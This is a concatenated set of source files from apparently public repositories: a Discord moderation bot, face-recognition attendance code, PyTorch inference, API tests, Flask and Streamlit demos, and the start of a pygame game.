member.add_roles(muted_role)\r\n embed = discord.Embed(title=\"User Muted!\",\r\n description=f\"{member.mention} has been muted\")\r\n await ctx.send(embed=embed)\r\n # await ctx.send(member.mention + \" has been muted\")\r\n\r\n\r\n@bot.command(aliases=['um'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def unmute(ctx, member: discord.Member):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot mute or unmute yourself\")\r\n return\r\n muted_role = ctx.guild.get_role(900024798585954325)\r\n\r\n await member.remove_roles(muted_role)\r\n embed = discord.Embed(title=\"User Unmuted!\",\r\n description=f\"{member.mention} has been unmuted\")\r\n await ctx.send(embed=embed)\r\n # await ctx.send(member.mention + \" has been unmuted\")\r\n\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n for word in read_blacklisted_words():\r\n if word in message.content:\r\n await message.delete()\r\n embed = discord.Embed(\r\n title=\"Warning!\", description=f\"Warning!! {message.author.mention} you're using blacklisted Words!!\")\r\n # await message.channel.send(f\"Warning!! {message.author} you're using blacklisted Words!!\")\r\n await message.channel.send(embed=embed)\r\n\r\n if str(message.channel) == \"images-only\" and message.content != \"\":\r\n await message.channel.purge(limit=1)\r\n\r\n await bot.process_commands(message)\r\n\r\n\r\n@bot.event\r\nasync def on_command_error(ctx, error):\r\n if isinstance(error, commands.MissingPermissions):\r\n await ctx.send(\"I'm gonna pretend you didn't say that because you're not a moderator ;-;\")\r\n elif isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(\"You have not entered all the required arguments\")\r\n else:\r\n print(error)\r\n\r\n\r\n@bot.command(aliases=['info'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def user(ctx, member: discord.Member):\r\n embed = discord.Embed(\r\n title=member.name, description=member.mention, color=discord.Colour.red())\r\n embed.add_field(name=\"ID\", value=member.id, inline=True)\r\n embed.set_thumbnail(url=member.avatar_url)\r\n embed.set_footer(icon_url=ctx.author.avatar_url,\r\n text=f\"Requested by {ctx.author.name}\")\r\n await ctx.send(embed=embed)\r\n\r\n\r\n@bot.command(aliases=['bl'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def blacklist(ctx):\r\n blacklisted_words = read_blacklisted_words()\r\n embed = discord.Embed(title=\"Black Listed Words\",\r\n description=', '.join(blacklisted_words), color=discord.Colour.red())\r\n await ctx.channel.send(embed=embed)\r\n\r\n\r\n@bot.command(aliases=['atb'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def addtoblacklist(ctx, *, word):\r\n with open(\"blacklistedWords.json\") as json_file:\r\n data = json.load(json_file)\r\n temp = data[\"blacklistedWords\"]\r\n temp.append(word)\r\n write_json(data)\r\n\r\n\r\n@bot.command(aliases=['h'])\r\nasync def help(ctx):\r\n embed = discord.Embed(title=f\"**Help Command**\", description=\"*Hi, I'm PikaBot. I'm here to help you in moderating this server. I'm developed by Soumyajoy Das aka <@!583523069167927296>*\\n\\n**!clear N or !c N:**\\t*Deletes N Messages*\\n\\n**!kick @user or !k @user:**\\t*Kick users from server*\\n\\n**!ban @user or !b @user:**\\t*Ban users from server*\\n\\n**!unban @user#id or !ub @user#id:**\\t*Unban banned users*\\n\\n**!mute or !m:**\\t*Mutes users by adding a mute role*\\n\\n**!umute or !um:**\\t*Unmutes users by removing mute role*\\n\\n**!user or !info:**\\t*Gives user info*\\n\\n**!blacklist or !bl:**\\t*Displays Blacklisted Words*\\n\\n**!addtoblacklist str or !atb str:**\\t*Add words to blacklist*\\n\\n\\n**NOTE:**\\t**These Commands can only be used by server Moderators**\", color=discord.Colour.from_rgb(245, 158, 11))\r\n embed.set_footer(icon_url=ctx.author.avatar_url,\r\n text=f\"Help command requested by {ctx.author.name}\")\r\n await ctx.send(embed=embed)\r\n\r\n\r\n\r\nbot.run(os.getenv('TOKEN'))\r\n","repo_name":"soumyajoydas01/moderation-bot","sub_path":"mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70494205992","text":"from colorlog import info, warning, error, debug\nfrom os import urandom\nfrom base64 import b32encode\n\nfrom yangson.instance import InstanceRoute\nfrom yangson.exceptions import NonexistentInstance\n\nfrom jetconf.helpers import JsonNodeT, PathFormat\nfrom jetconf.data import BaseDatastore\nfrom .assignments import assigned\n\nclass OpHandlersContainer:\n def __init__(self, ds: BaseDatastore):\n self.ds = ds\n\n def establish_subscription_op(self, input_args: JsonNodeT, username: str) -> JsonNodeT:\n info(f'called establish_subscription: {input_args}')\n return {'id':2}\n\n def refresh_watcher_id_op(self, input_args: JsonNodeT, username: str) -> JsonNodeT:\n watch_id = input_args.get('watcher-id')\n info(f'called refresh-watcher-id: {watch_id}')\n debug(f' (from input args: {input_args})')\n assigned.check_timeouts()\n\n if not watch_id:\n raise ValueError(f'Could not extract watcher-id from {input_args}')\n w = assigned.watchers.get(watch_id)\n if not w:\n raise ValueError(f'Found no watcher-id {watch_id}')\n w.refresh()\n\n def get_new_watcher_id_op(self, input_args: JsonNodeT, username: str) -> JsonNodeT:\n info(f'called get-new-watcher-id: {input_args}')\n watcher_id = b32encode(urandom(10)).decode('utf-8')\n assigned.create_watcher(watcher_id)\n return {'watcher-id': watcher_id, 'refresh-period': 20}\n\ndef register_op_handlers(ds: BaseDatastore):\n op_handlers_obj = OpHandlersContainer(ds)\n ds.handlers.op.register(op_handlers_obj.establish_subscription_op,\n \"ietf-subscribed-notifications:establish-subscription\")\n ds.handlers.op.register(op_handlers_obj.get_new_watcher_id_op,\n \"ietf-mnat:get-new-watcher-id\")\n ds.handlers.op.register(op_handlers_obj.refresh_watcher_id_op,\n \"ietf-mnat:refresh-watcher-id\")\n\n","repo_name":"GrumpyOldTroll/mnat","sub_path":"server/module/jetconf_mnat/usr_op_handlers.py","file_name":"usr_op_handlers.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"4480070476","text":"\"\"\"Module documentation for engagement_model.py\n This script contains the class EngageModel. Within this class there are several functions such as class_lst().\n\"\"\"\n\nimport argparse\nimport cv2\nimport sys\nimport numpy as np\nimport os\nimport json\nimport csv\nfrom csv import writer\nfrom datetime import datetime\nimport sqlite3\nimport ast\n\n__author__ = \"Philip Baker & Keith Spencer-Edgar\"\n__date__ = \"25-10-2020\"\n\nclass EngageModel:\n def __init__(self, args):\n self.args = args\n self.code = args.code\n self.threshold = args.threshold\n\n def class_list(self, detection_features, data, this_class_name, class_photo_name, qual, average_face_width):\n \"\"\"\n iterate through detected faces, comparing their features to those enrolled in the class\n\n Parameters:\n ----------\n detection_features: ndarray(n,512)\n features from tiny face detection\n data: list \n list of lists, first list upi, second list features for corresponding upi\n this_class_name: string\n name of class\n class_photo_name: string\n name of photo\n qual: float\n quality factor of photo\n average_face_width: float\n the average width of detection for photo\n Returns :\n ---------\n roll: list\n all data for each studnet in class\n\n \"\"\"\n roll = list()\n for i in range(len(data[0])): # for each person supposed to be in the class\n name = data[0][i]\n match = False\n j = 0\n # go through all detections and compare to this person\n while not match and j < np.shape(detection_features)[0]:\n dist = np.sum(np.square(detection_features[j, :] - data[1][i][:]))\n if dist < self.args.threshold:\n match = True\n j += 1\n\n if match:\n roll.append(list([name, 1, this_class_name,\n os.path.basename(os.path.normpath(class_photo_name)), qual, average_face_width]))\n else:\n roll.append(list([name, 0, this_class_name,\n os.path.basename(os.path.normpath(class_photo_name)), qual, average_face_width]))\n\n return roll\n\n # calculate embeddings for each sample\n def get_embeddings(model, class_faces):\n \"\"\"\n iterate through detected faces and calculate feature embeddings for each face\n\n Parameters:\n ----------\n class_faces: list of lists, each list has a image (ndarray:(x,y,3)) and a score (float)\n list of cropped detections with scores \n Returns :\n ---------\n features: numpy array, (n, 512)\n start point of the bbox in target image\n face_widths : list\n list of face widths\n\n \"\"\"\n\n feat_len = len(class_faces)\n features = np.zeros((feat_len, 512))\n face_widths = list()\n isface = False\n i = 0\n for img in class_faces:\n\n try:\n img2 = model.get_input(img[0])\n f1 = model.get_feature(img2)\n features[i, :] = f1\n i += 1\n isface = True\n except:\n print('ArcFace could not detect face')\n features = np.delete(features, i, 0)\n isface = False\n\n if isface:\n face_widths.append(img[1])\n\n return features, face_widths\n\n def get_profiles(self):\n \"\"\"\n query feature embeddings for students in a specific class from the SQLite database\n \n \"\"\"\n conn = sqlite3.connect('engage.db')\n c = conn.cursor()\n c.execute(\n \"SELECT * FROM features INNER JOIN %s ON %s.upi = features.upi\" % (repr(self.code), repr(self.code)))\n data = c.fetchall()\n conn.commit()\n conn.close()\n\n return data\n\n # compare samples to profile face embeddings\n def compare_embeddings(self, sample_features, data):\n \"\"\"\n compares feature embeddings\n\n Parameters:\n ----------\n sample_features : numpy array, (n, 512)\n features from detections\n data : list\n upis and corresponding features\n\n \"\"\"\n conn = sqlite3.connect('engage.db')\n c = conn.cursor()\n date = str(datetime.date(datetime.now()))\n for i in range(len(sorted(data))):\n count = 0\n j = 0\n while count == 0 and j < np.shape(sample_features)[0]:\n f1 = sample_features[j, :] # sample features\n f2 = np.array(ast.literal_eval(data[i][1])) # profile features\n f2 = f2.astype('float64')\n dist = np.sum(np.square(f1 - f2))\n name = data[i][0]\n if dist < self.args.threshold:\n count = 1\n c.execute(\n \"\"\"INSERT OR IGNORE INTO attendance VALUES (:date, :upi, :course_code, :attendance)\"\"\",\n {'date': date, 'upi': name, 'course_code': self.code, 'attendance': 1})\n j += 1\n if count == 0:\n name = data[i][0]\n c.execute(\"\"\"INSERT OR IGNORE INTO attendance VALUES (:date, :upi, :course_code, :attendance)\"\"\",\n {'date': date, 'upi': name, 'course_code': self.code, 'attendance': 0})\n conn.commit()\n conn.close()\n","repo_name":"philip-baker/engage","sub_path":"helper/engagement_model.py","file_name":"engagement_model.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"529264697","text":"import csv \nimport sys\nimport numpy as np\nfrom PIL import Image\n\nimport torch\nimport torch.nn as nn\nfrom torchvision import models\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\n\n# Utils\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint(\"Device used: \", device)\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\nlabel2class = ['Alarm_Clock', 'Backpack', 'Batteries', 'Bed', 'Bike', 'Bottle', 'Bucket', 'Calculator', 'Calendar', 'Candles', 'Chair', 'Clipboards', 'Computer', 'Couch', 'Curtains', 'Desk_Lamp', 'Drill', 'Eraser', 'Exit_Sign', 'Fan', 'File_Cabinet', 'Flipflops', 'Flowers', 'Folder', 'Fork', 'Glasses', 'Hammer', 'Helmet', 'Kettle', 'Keyboard', 'Knives', 'Lamp_Shade', 'Laptop', 'Marker', 'Monitor', 'Mop', 'Mouse', 'Mug', 'Notebook', 'Oven', 'Pan', 'Paper_Clip', 'Pen', 'Pencil', 'Postit_Notes', 'Printer', 'Push_Pin', 'Radio', 'Refrigerator', 'Ruler', 'Scissors', 'Screwdriver', 'Shelf', 'Sink', 'Sneakers', 'Soda', 'Speaker', 'Spoon', 'TV', 'Table', 'Telephone', 'ToothBrush', 'Toys', 'Trash_Can', 'Webcam']\nclass2label = {'Alarm_Clock': 0, 'Backpack': 1, 'Batteries': 2, 'Bed': 3, 'Bike': 4, 'Bottle': 5, 'Bucket': 6, 'Calculator': 7, 'Calendar': 8, 'Candles': 9, 'Chair': 10, 'Clipboards': 11, 'Computer': 12, 'Couch': 13, 'Curtains': 14, 'Desk_Lamp': 15, 'Drill': 16, 'Eraser': 17, 'Exit_Sign': 18, 'Fan': 19, 'File_Cabinet': 20, 'Flipflops': 21, 'Flowers': 22, 'Folder': 23, 'Fork': 24, 'Glasses': 25, 'Hammer': 26, 'Helmet': 27, 'Kettle': 28, 'Keyboard': 29, 'Knives': 30, 'Lamp_Shade': 31, 'Laptop': 32, 'Marker': 33, 'Monitor': 34, 'Mop': 35, 'Mouse': 36, 'Mug': 37, 'Notebook': 38, 'Oven': 39, 'Pan': 40, 'Paper_Clip': 41, 'Pen': 42, 'Pencil': 43, 'Postit_Notes': 44, 'Printer': 45, 'Push_Pin': 46, 'Radio': 47, 'Refrigerator': 48, 'Ruler': 49, 'Scissors': 50, 'Screwdriver': 51, 'Shelf': 52, 'Sink': 53, 'Sneakers': 54, 'Soda': 55, 'Speaker': 56, 'Spoon': 57, 'TV': 58, 'Table': 59, 'Telephone': 60, 'ToothBrush': 61, 'Toys': 62, 'Trash_Can': 63, 'Webcam': 64}\n\n# Custom Dataset & DataLoader\nclass HW4P2ATest(Dataset):\n def __init__(self, dirpath, csvpath, transform=None):\n self.dirpath = dirpath\n self.filenames = []\n with open(csvpath) as f:\n csvreader = csv.reader(f)\n for row in csvreader:\n id, fn, klass = row\n if id != 'id':\n self.filenames.append(fn)\n self.transform = transform\n \n def __getitem__(self, index):\n fn = self.filenames[index]\n image = Image.open(self.dirpath + '/' + fn)\n if self.transform is not None:\n image = self.transform(image)\n return image, fn\n \n def __len__(self):\n return len(self.filenames)\n\n\n\n# dataloader = {\n# 'train': DataLoader(trainset, batch_size=64, shuffle=True, num_workers=4),\n# 'val': DataLoader(valset, batch_size=64, shuffle=False, num_workers=4),\n# }\n# dataiter = iter(dataloader['train'])\n# images, labels = dataiter.next()\n# print('Image tensor in each batch:', images.shape, images.dtype)\n# print('Image tensor in each batch:', labels.shape, labels.dtype)\n\n# Model\nclass MyNN(nn.Module):\n def __init__(self, backbone_checkpoint=None, classifier_checkpoint=None, fix_backbone=False):\n super().__init__()\n self.backbone = models.resnet50(weights=None)\n if backbone_checkpoint is not None:\n self.backbone.load_state_dict(torch.load(backbone_checkpoint))\n for param in self.backbone.parameters():\n if fix_backbone:\n param.requires_grad = False\n else:\n param.requires_grad = True\n\n self.classifier = nn.Sequential(\n nn.Linear(1000, 512),\n nn.BatchNorm1d(512),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(512, 256),\n nn.BatchNorm1d(256),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(256, 65)\n )\n if classifier_checkpoint is not None:\n self.classifier.load_state_dict(torch.load(classifier_checkpoint))\n for param in self.classifier.parameters():\n param.requires_grad = True\n \n def forward(self, x):\n x = self.backbone(x)\n x = self.classifier(x)\n return x\n\n def get_params_to_update(self):\n params_to_update = []\n for param in self.backbone.parameters():\n if param.requires_grad:\n params_to_update.append(param)\n else:\n break\n for param in self.classifier.parameters():\n if param.requires_grad:\n params_to_update.append(param)\n else:\n break\n return params_to_update\n\n# Output\ndef out2csv(outpath, imagenames, predictions, in_csv):\n fout = open(outpath, \"w\")\n with open(in_csv) as fin:\n csvreader = csv.reader(fin)\n for row in csvreader:\n id, fn, klass = row\n if id != 'id':\n index = imagenames.index(fn)\n klass = predictions[index]\n fout.write(id + \",\" + fn + \",\" + klass + \"\\n\")\n else:\n fout.write(id + \",\" + fn + \",\" + klass + \"\\n\")\n fout.close()\n\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print('Error: wrong format')\n print('\\tpython3 hw4_2_test.py ')\n exit()\n\n in_csv = sys.argv[1]\n in_dir = sys.argv[2]\n out_csv = sys.argv[3]\n mode = sys.argv[4]\n\n # dataset & dataloader\n valset = HW4P2ATest(\n dirpath=in_dir,\n csvpath=in_csv,\n transform=transforms.Compose([\n transforms.Resize((128, 128)),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n ])\n )\n dataloader = {\n 'val': DataLoader(valset, batch_size=64, shuffle=False, num_workers=4),\n }\n\n # model\n backbone_checkpoint=\"./bestcheckpoin/hw4_2C_backbone.pt\"\n classifier_checkpoint=\"./bestcheckpoin/hw4_2C_classifier.pt\"\n # if mode == 'A':\n # backbone_checkpoint=\"./checkpoint/hw4_2A_backbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2A_classifier.pt\"\n # elif mode == 'B':\n # backbone_checkpoint=\"./checkpoint/hw4_2B_backbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2B_classifier.pt\"\n # elif mode == 'C':\n # backbone_checkpoint=\"./checkpoint/hw4_2C_backbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2C_classifier.pt\"\n # elif mode == 'D':\n # backbone_checkpoint=\"./checkpoint/pretrain_model_SL.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2D_classifier.pt\"\n # else:\n # backbone_checkpoint=\"./checkpoint/mybackbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2E_classifier.pt\"\n\n mynn = MyNN(\n backbone_checkpoint=backbone_checkpoint,\n classifier_checkpoint=classifier_checkpoint,\n fix_backbone=False\n )\n mynn = mynn.to(device)\n\n # inference\n mynn.eval()\n filenames = []\n klasses = []\n with torch.no_grad():\n for _, (images, fns) in enumerate(dataloader['val']):\n images = images.to(device) \n\n outs = mynn(images)\n preds = outs.max(1, keepdim=True)[1]\n filenames.extend(fns)\n for pred in preds:\n klasses.append(label2class[pred])\n\n # output\n out2csv(out_csv, filenames, klasses, in_csv)\n\n","repo_name":"mirkat1206/NTU-DLCV-Fall-2022","sub_path":"hw4/hw4_2_test.py","file_name":"hw4_2_test.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"126238139","text":"# -*- coding: utf-8 -*-\nimport json\n\nfrom mock import mock\nfrom nose_parameterized import parameterized\n\nfrom mpfs.core.services.discovery_service import DiscoveryService\nfrom test.base_suit import (\n UploadFileTestCaseMixin,\n UserTestCaseMixin,\n)\nfrom test.helpers.size_units import KB\nfrom test.parallelly.api.disk.base import DiskApiTestCase\nfrom mpfs.common.static import tags\nfrom mpfs.config import settings\n\n\nclass MPFSFile(object):\n def __init__(self, name, size=123):\n self.mpfs_path = '/disk/%s' % name\n self.platform_path = 'disk:/%s' % name\n self.size = size\n\n\nclass OnlineEditorURLTestCase(UserTestCaseMixin, UploadFileTestCaseMixin, DiskApiTestCase):\n api_mode = tags.platform.EXTERNAL\n api_version = 'v1'\n method = 'GET'\n url = 'disk/resources/online-editor'\n\n file_supported_with_conversion = MPFSFile('enot.doc')\n supported_file = MPFSFile('enot.docx')\n unsupported_file_by_extension = MPFSFile('enot.rtf')\n unsupported_file_by_size = MPFSFile('enot.xlsx', settings.office['size_limits']['Excel']['edit'] + 10*KB)\n\n allowed_client_id = settings.platform['disk_apps_ids'][0]\n\n @classmethod\n def setup_class(cls):\n super(OnlineEditorURLTestCase, cls).setup_class()\n with open('fixtures/xml/discovery.xml') as fd:\n discovery_response_xml = fd.read()\n with mock.patch('mpfs.core.services.discovery_service.DiscoveryService.open_url',\n return_value=discovery_response_xml):\n DiscoveryService().ensure_cache()\n\n def setup_method(self, method):\n super(OnlineEditorURLTestCase, self).setup_method(method)\n self.create_user(self.uid, noemail=1)\n for file in (self.file_supported_with_conversion,\n self.supported_file,\n self.unsupported_file_by_extension,\n self.unsupported_file_by_size):\n self.upload_file(self.uid, file.mpfs_path, file_data={'size': file.size})\n\n @parameterized.expand([\n ('supported', supported_file.platform_path, None, 'disk.yandex.ru'),\n ('supported_with_conversion', file_supported_with_conversion.platform_path, None, 'disk.yandex.ru'),\n ('tld_passed', file_supported_with_conversion.platform_path, 'com', 'disk.yandex.com'),\n ('unsupported_tld_passed', file_supported_with_conversion.platform_path, 'pt', 'disk.yandex.ru'),\n ])\n def test_positive_cases(self, case_name, path, tld, expected_hostname):\n query = {'path': path}\n if tld is not None:\n query['tld'] = tld\n\n with self.specified_client(id=self.allowed_client_id):\n resp = self.client.request(self.method, self.url,\n query=query)\n\n result = json.loads(resp.content)\n\n assert 'edit_url' in result\n assert expected_hostname in result['edit_url']\n\n\n @parameterized.expand([\n ('by_size', unsupported_file_by_size.platform_path),\n ('by_extension', unsupported_file_by_extension.platform_path),\n ])\n def test_unsupported_files(self, case_name, path):\n with self.specified_client(id=self.allowed_client_id):\n resp = self.client.request(self.method, self.url,\n query={'path': path})\n\n assert resp.status_code == 415\n\n @mock.patch('mpfs.core.office.util.FEATURE_TOGGLES_ONLYOFFICE_EDITOR_FOR_USERS_WITHOUT_EDITOR_ENABLED', False)\n def test_user_with_disabled_editor(self):\n with self.specified_client(id=self.allowed_client_id), \\\n mock.patch('mpfs.core.office.logic.microsoft.MicrosoftEditor.is_user_allowed', return_value=False):\n resp = self.client.request(self.method, self.url,\n query={'path': self.supported_file.platform_path})\n\n assert resp.status_code == 403\n\n def test_not_found(self):\n with self.specified_client(id=self.allowed_client_id):\n resp = self.client.request(self.method, self.url,\n query={'path': u'disk:/Диплом 2003.docx'})\n\n assert resp.status_code == 404\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/test/parallelly/api/disk/office_online_editor_url.py","file_name":"office_online_editor_url.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"524387912","text":"from flask import Flask, request, render_template \nfrom flask import redirect, url_for\n\nimport os\nimport os.path\n\nimport gensim\nfrom modules import mod_recommend\n\n\n''' BASICAL FUNCTIONS BEGIN '''\n\napp = Flask(__name__, static_url_path='')\n\n@app.route('/error', methods=['GET', 'POST'])\n#@interceptor(login_required=False)\ndef error():\n\tmsg = request.args.get('msg')\n\treturn render_template('error.html',msg=msg)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n\treturn render_template('error.html',msg=e)\n\n\n''' BUSSINESS FUNCTIONS BEGIN '''\n\n\n@app.route('/recommend', methods=['GET', 'POST'])\n#@interceptor(login_required=True)\ndef search():\n\tresult = mod_recommend.service(request)\n\treturn result \n\n\n''' MAIN ENTRY '''\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run(host=\"jinrongdao.com\",port=5200)\n","repo_name":"hongleifu/recommend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31811212829","text":"import boto3\n\n#example variable with a bucket name\nBUCKET_NAME = \"cf-templates-15esisdhwosya-eu-west-2\"\n\ns3 = boto3.client(\"s3\")\n\n\n# Presigned URL to give limited access to an unauthorized user\nurl = s3.generate_presigned_url(\n \"get_object\", Params={\"Bucket\": BUCKET_NAME, \"Key\": \"burger.jpg\"}, ExpiresIn=30\n)\nprint(url)","repo_name":"giandulfo/boto3s3","sub_path":"presignedUrl.py","file_name":"presignedUrl.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74855456552","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nfrom bokeh.plotting import figure\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\n\nimport plotLib\n\n@st.cache\ndef fetchDataset(dataset):\n return sns.load_dataset(dataset)\n\nst.set_page_config(layout=\"wide\")\nst.header(\"Plotting with Streamlit\")\n\ngenre = st.sidebar.radio(\"Pick a Plotting Package\",('matplotlib','seaborn', 'plotly express', 'plotly', 'bokeh','altair','networkx','vega'))\n\nif genre == 'matplotlib':\n st.header(\"matplotlib\")\n st.write(\"https://matplotlib.org/stable/gallery/index.html\")\n with st.echo():\n fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(9, 4))\n plotLib.matPlot(axs) # internal library\n st.write(fig)\n\nelif genre == 'bokeh':\n st.header(\"bokeh\")\n st.write(\"https://docs.bokeh.org/en/latest/docs/gallery.html\")\n with st.echo():\n p = figure( title=\"Texas Unemployment, 2009\", tools=\"pan,wheel_zoom,reset,hover,save\",\n x_axis_location=None, y_axis_location=None,\n tooltips=[(\"Name\", \"@name\"), (\"Unemployment rate\", \"@rate%\"), (\"(Long, Lat)\", \"($x, $y)\")])\n plotLib.bokehPlot(p) # internal library\n st.bokeh_chart(p, use_container_width=False)\n\nelif genre == 'plotly express':\n st.header(\"plotly express\")\n st.write(\"https://plotly.com/python/plotly-express/\")\n with st.echo():\n import plotly.express as px\n df = px.data.iris()\n fig = px.scatter_matrix(df, dimensions=[\"sepal_width\", \"sepal_length\", \"petal_width\", \"petal_length\"], color=\"species\")\n st.plotly_chart(fig, use_container_width=True)\nelif genre == 'plotly':\n st.header(\"plotly\")\n st.write(\"https://plotly.com/python\")\n with st.echo():\n fig = plotLib.plotlyPlot() # internal library\n st.plotly_chart(fig, use_container_width=True)\nelif genre == 'altair':\n st.header(\"altair\")\n st.write(\"https://altair-viz.github.io/gallery/\")\n with st.echo():\n fig = plotLib.altairPlot()\n st.write(fig) # internal library\nelif genre == 'networkx':\n st.header(\"networkx\")\n st.write(\"https://networkx.org/documentation/stable/auto_examples/index.html\")\n with st.echo():\n import networkx as nx\n # G = nx.grid_2d_graph(5, 5) # 5x5 grid\n G = nx.lollipop_graph(4, 6)\n fig, ax = plt.subplots()\n nx.draw(G, ax = ax, with_labels = True)\n st.write(fig)\nelif genre == 'vega':\n st.header(\"vega\")\n st.write(\"https://vega.github.io/vega-lite/examples/\")\n with st.echo():\n df = pd.DataFrame(np.random.randn(200, 3),columns=['a', 'b', 'c'])\n st.vega_lite_chart(df, {\n 'mark': {'type': 'circle', 'tooltip': True},\n 'encoding': {\n 'x': {'field': 'a', 'type': 'quantitative'},\n 'y': {'field': 'b', 'type': 'quantitative'},\n 'size': {'field': 'c', 'type': 'quantitative'},\n 'color': {'field': 'c', 'type': 'quantitative'}},\n }, True)\nelif genre == 'seaborn':\n st.header(\"seaborn\")\n st.write(\"https://seaborn.pydata.org/examples/index.html\")\n with st.echo():\n \n penguins = fetchDataset(\"penguins\")\n\n st.title(\"Penguins PairPlot\")\n fig = sns.pairplot(penguins, hue=\"species\")\n st.pyplot(fig)\n\n\n","repo_name":"cliffweng/datavis_streamlit","sub_path":"mainDash.py","file_name":"mainDash.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73051054313","text":"# Stefan in Sensorland\nimport matplotlib.image as img\nimport numpy as np\nimport os\nimport time\nimport pygame\nimport random\nfrom leaderboard.leader_board import *\nfrom controls.input_control import *\nfrom shutdown.shutdown import ShutDown\n\nGROUND_LEVEL = 31\nNUMBER_OF_CIRCUIT_ELEMENTS = 23 #Number of parts to combine the circuits\n#Values for the color transformation of the circuit\nCIRCUIT_RED_VALUES = [9, 126, 210]\nCIRCUIT_TARGET_VALUES = [[[9, 94, 42], [126, 152, 63], [210, 192, 42]],\n [[2, 45, 213], [126, 152, 63], [210, 192, 42]],\n [[213, 64, 24], [126, 152, 63], [210, 192, 42]],\n [[0, 0, 0], [126, 152, 63], [210, 192, 42]],\n [[213, 24, 148], [126, 152, 63], [210, 192, 42]],\n [[9, 94, 42], [126, 152, 63], [210, 192, 42]]\n ]\nSENSORLAND_SPEED = [2.5, 3, 4, 5, 6, 7]\nSENSORLAND_ITERATION_INC = [1, 2, 2, 3, 3, 4]\nSENSORLAND_END_OF_ROAD = [500, 2000, 3000, 4000, 5000, 50000]\n\nSENSORLAND_PARABOLAS = [[-8, -6, -4, -2, -1, -1, -1, -1, 0, 0, 0, 1, 1, 1, 1, 2, 4, 6, 8],\n [-8, -6, -4, -2, -2, -1, -1, 1, 1, 2, 2, 4, 6, 8],\n [-8, -6, -4, -3, -2, -1, 1, 2, 3, 4, 6, 8],\n [-10, -7, -4, -2, -1, 1, 2, 4, 7, 10],\n [-10, -7, -4, -3, 3, 4, 7, 10],\n [-12, -8, -4, 4, 8, 12]]\n\ndef load_and_transpose_image(path_to_image):\n \"\"\"Load and transpose image, scale it to range 0,...,255\n\n :param path_to_image: path to image\n :return:\n \"\"\"\n image_raw = img.imread(path_to_image)\n return np.transpose(image_raw, (1, 0, 2)) * 255\n\n\ndef transform_color(image, red_values, target_values):\n \"\"\"Do a color transformation of an image based on its red values\n It would be better if the image was gray-scale and we could color\n it with the uniqe gray values, but Wunschkonzert ist Mittwochs ;-)\n\n :param image: original image\n :param red_values: key values\n :param target_values: triplets that hav the soecified red value are colored with\n these values\n :return: colorized image\n \"\"\"\n image_transformed = image.copy()\n image_red = image[:, :, 0]\n for key, target in zip(red_values, target_values):\n image_transformed[:, :, 0][image_red == key] = target[0]\n image_transformed[:, :, 1][image_red == key] = target[1]\n image_transformed[:, :, 2][image_red == key] = target[2]\n return image_transformed\n\n\nclass Circuit:\n \"\"\"Class to handle the random circuit of sensor land\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Init the circuit\n \"\"\"\n self.elements = []\n self.max_element_size = 64\n for i in range(NUMBER_OF_CIRCUIT_ELEMENTS):\n element = load_and_transpose_image('sensorland/images/circuit_{:d}.png'.format(i))\n self.elements.append(element)\n self.max_element_size = max(self.max_element_size, element.shape[0])\n self.y = element.shape[1]\n self.position = 0\n self.image = np.zeros((self.max_element_size * 3, self.y, 4))\n self.generate_image()\n\n def scroll(self, delta=1):\n \"\"\"Scroll the image further\n\n :param delta: scroll by delta steps\n :return:\n \"\"\"\n if delta>0:\n self.image[:-delta, :, :] = self.image[delta:, :, :]\n self.position -= delta\n if self.position <= 2 * self.max_element_size:\n self.generate_image()\n\n def generate_image(self):\n \"\"\"Fill the image with random circuit elements\n\n :return:\n \"\"\"\n while self.position <= 2*self.max_element_size:\n index = random.randint(0, len(self.elements)-1)\n new_element = self.elements[index]\n delta = new_element.shape[0]\n self.image[self.position:self.position+delta, :, :] = new_element[:,:,:]\n self.position += delta\n\ndef get_image_scene(position_x, width_x, image_in):\n 